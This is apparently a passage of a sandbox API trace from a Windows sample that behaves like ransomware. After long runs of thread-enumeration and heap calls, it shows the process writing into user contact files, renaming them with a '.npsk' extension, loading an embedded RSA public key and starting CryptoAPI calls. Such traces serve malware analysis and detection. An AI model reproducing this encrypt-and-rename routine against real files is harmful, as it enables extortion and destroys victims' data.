lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.166] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.167] GetTickCount () returned 0x1138daf [0212.167] GetCurrentThreadId () returned 0x1cc [0212.167] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.167] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.167] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.168] GetTickCount () returned 0x1138daf [0212.168] GetCurrentThreadId () returned 0x1cc [0212.168] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.168] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.168] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.169] GetTickCount () returned 0x1138daf [0212.169] GetCurrentThreadId () returned 0x1cc [0212.169] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.169] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.169] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.170] GetTickCount () returned 0x1138daf [0212.170] GetCurrentThreadId () returned 0x1cc [0212.170] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.170] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.170] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.171] GetTickCount () returned 0x1138daf [0212.171] GetCurrentThreadId () returned 0x1cc [0212.171] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.171] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.171] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.172] GetTickCount () returned 0x1138daf [0212.172] GetCurrentThreadId () returned 0x1cc [0212.172] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.172] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.172] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.173] GetTickCount () returned 0x1138daf [0212.173] GetCurrentThreadId () returned 0x1cc [0212.173] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.173] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.173] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.174] GetTickCount () returned 0x1138daf [0212.174] GetCurrentThreadId () returned 0x1cc [0212.174] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.174] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.174] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.175] GetTickCount () returned 0x1138daf [0212.175] GetCurrentThreadId () returned 0x1cc [0212.175] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.175] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.175] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.176] GetTickCount () returned 0x1138daf [0212.176] GetCurrentThreadId () returned 0x1cc [0212.176] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.176] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.176] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.176] GetTickCount () returned 0x1138daf [0212.177] GetCurrentThreadId () returned 0x1cc [0212.177] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.177] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.177] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.177] GetTickCount () returned 0x1138daf [0212.177] GetCurrentThreadId () returned 0x1cc [0212.178] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.178] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.178] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.179] GetTickCount () returned 0x1138dbf [0212.179] GetCurrentThreadId () returned 0x1cc [0212.179] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.179] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.179] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.180] GetTickCount () returned 0x1138dbf [0212.180] GetCurrentThreadId () returned 0x1cc [0212.180] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.180] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.180] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.181] GetTickCount () returned 0x1138dbf [0212.181] GetCurrentThreadId () returned 0x1cc [0212.181] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.181] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.181] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.182] GetTickCount () returned 0x1138dbf [0212.182] GetCurrentThreadId () returned 0x1cc [0212.182] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.182] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.182] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.183] GetTickCount () returned 0x1138dbf [0212.183] GetCurrentThreadId () returned 0x1cc [0212.183] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.183] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.183] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.184] GetTickCount () returned 0x1138dbf [0212.184] GetCurrentThreadId () returned 0x1cc [0212.184] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.184] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.184] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.185] GetTickCount () returned 0x1138dbf [0212.185] GetCurrentThreadId () returned 0x1cc [0212.185] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.185] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.185] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.186] GetTickCount () returned 0x1138dbf [0212.186] GetCurrentThreadId () returned 0x1cc [0212.186] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.186] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.186] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.187] GetTickCount () returned 0x1138dbf [0212.187] GetCurrentThreadId () returned 0x1cc [0212.187] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.187] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.187] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.188] GetTickCount () returned 0x1138dbf [0212.188] GetCurrentThreadId () returned 0x1cc [0212.188] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.188] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.188] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.189] GetTickCount () returned 0x1138dbf [0212.189] GetCurrentThreadId () returned 0x1cc [0212.189] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.189] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.189] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.193] GetTickCount () returned 0x1138dbf [0212.193] GetCurrentThreadId () returned 0x1cc [0212.193] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.193] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.193] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.194] GetTickCount () returned 0x1138dbf [0212.194] GetCurrentThreadId () returned 0x1cc [0212.194] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.194] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.194] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.195] GetTickCount () returned 0x1138dcf [0212.195] GetCurrentThreadId () returned 0x1cc [0212.195] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.195] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.195] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.196] GetTickCount () returned 0x1138dcf [0212.196] GetCurrentThreadId () returned 0x1cc [0212.196] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.196] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.196] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.197] GetTickCount () returned 0x1138dcf [0212.197] GetCurrentThreadId () returned 0x1cc [0212.197] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.197] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.197] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.198] GetTickCount () returned 0x1138dcf [0212.198] GetCurrentThreadId () returned 0x1cc [0212.198] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.198] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.198] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.199] GetTickCount () returned 0x1138dcf [0212.199] GetCurrentThreadId () returned 0x1cc [0212.199] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.199] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.199] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.200] GetTickCount () returned 0x1138dcf [0212.200] GetCurrentThreadId () returned 0x1cc [0212.200] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.200] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.200] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.201] GetTickCount () returned 0x1138dcf [0212.201] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.202] GetTickCount () returned 0x1138dcf [0212.202] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.203] GetTickCount () returned 0x1138dcf [0212.203] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.203] GetTickCount () returned 0x1138dcf [0212.203] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.204] GetTickCount () returned 0x1138dcf [0212.204] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.205] GetTickCount () returned 0x1138dcf [0212.205] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.206] GetTickCount () returned 0x1138dcf [0212.206] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.207] GetTickCount () returned 0x1138dcf [0212.207] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.208] GetTickCount () returned 0x1138dcf [0212.208] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.209] GetTickCount () returned 0x1138dcf [0212.209] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.210] GetTickCount () returned 0x1138dde [0212.210] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.210] GetTickCount () returned 0x1138dde [0212.211] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.211] GetTickCount () returned 0x1138dde [0212.211] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.212] GetTickCount () returned 0x1138dde [0212.212] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.213] GetTickCount () returned 0x1138dde [0212.213] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.214] GetTickCount () returned 0x1138dde [0212.214] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.215] GetTickCount () returned 0x1138dde [0212.215] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.216] GetTickCount () returned 0x1138dde [0212.216] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.217] GetTickCount () returned 0x1138dde [0212.217] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.218] GetTickCount () returned 0x1138dde [0212.218] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.218] GetTickCount () returned 0x1138dde [0212.218] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.219] GetTickCount () returned 0x1138dde [0212.219] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.220] GetTickCount () returned 0x1138dde [0212.220] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.221] GetTickCount () returned 0x1138dde [0212.221] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.222] GetTickCount () returned 0x1138dde [0212.222] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.223] GetTickCount () returned 0x1138dde [0212.223] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.224] GetTickCount () returned 0x1138dde [0212.224] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.225] GetTickCount () returned 0x1138dde [0212.225] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.225] GetTickCount () returned 0x1138dee [0212.225] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.226] GetTickCount () returned 0x1138dee [0212.226] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.227] GetTickCount () returned 0x1138dee [0212.227] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.228] GetTickCount () returned 0x1138dee [0212.228] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.229] GetTickCount () returned 0x1138dee [0212.229] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.230] GetTickCount () returned 0x1138dee [0212.230] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.230] GetTickCount () returned 0x1138dee [0212.230] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.231] GetTickCount () returned 0x1138dee [0212.231] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.232] GetTickCount () returned 0x1138dee [0212.232] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.233] GetTickCount () returned 0x1138dee [0212.233] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.234] GetTickCount () returned 0x1138dee [0212.234] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.235] GetTickCount () returned 0x1138dee [0212.235] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.235] GetTickCount () returned 0x1138dee [0212.235] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.236] GetTickCount () returned 0x1138dee [0212.236] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.237] GetTickCount () returned 0x1138dee [0212.237] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.238] GetTickCount () returned 0x1138dee [0212.238] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.239] GetTickCount () returned 0x1138dee [0212.239] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.240] GetTickCount () returned 0x1138dee [0212.240] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.240] GetTickCount () returned 0x1138dee [0212.240] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.241] GetTickCount () returned 0x1138dfd [0212.241] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.242] GetTickCount () returned 0x1138dfd [0212.242] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.243] GetTickCount () returned 0x1138dfd [0212.243] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.244] GetTickCount () returned 0x1138dfd [0212.244] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.244] GetTickCount () returned 0x1138dfd [0212.244] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.245] GetTickCount () returned 0x1138dfd [0212.316] FreeLibrary (hLibModule=0x759e0000) returned 1 [0212.316] QueryPerformanceCounter (in: lpPerformanceCount=0x397efa4 | out: lpPerformanceCount=0x397efa4*=10825661704) returned 1 [0212.316] GlobalMemoryStatus (in: lpBuffer=0x397f414 | out: lpBuffer=0x397f414) [0212.330] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.373] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0212.374] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0212.374] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d598 [0212.374] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x428) returned 0x32ef680 [0212.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x32ef680, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0212.374] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x430) returned 0x3a8af88 [0212.374] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef680 | out: hHeap=0x750000) returned 1 [0212.374] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x82d598 | out: hHeap=0x750000) returned 1 [0212.374] WriteFile (in: hFile=0x61c, lpBuffer=0x3a8af88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3a8af88*, lpNumberOfBytesWritten=0x397fb50*=0x28, lpOverlapped=0x0) returned 1 [0212.374] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0212.374] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0212.374] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0212.374] CloseHandle (hObject=0x61c) returned 1 [0212.375] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x80) returned 0x7b20a0 [0212.375] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x890) returned 0x3a8af88 [0212.375] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b20a0 | out: hHeap=0x750000) returned 1 [0212.375] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.npsk")) returned 1 [0212.376] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0212.376] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.376] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0212.378] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0212.378] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0212.378] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3241248 [0212.378] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x80) returned 0x7b1d70 [0212.378] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3241248 | out: hHeap=0x750000) returned 1 [0212.378] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned=".contact" [0212.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0212.379] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=68382) returned 1 [0212.379] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0212.382] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.382] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0212.752] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.752] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.752] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.752] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0212.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.756] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1f6) returned 0x7a79b8 [0212.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.756] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0212.757] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 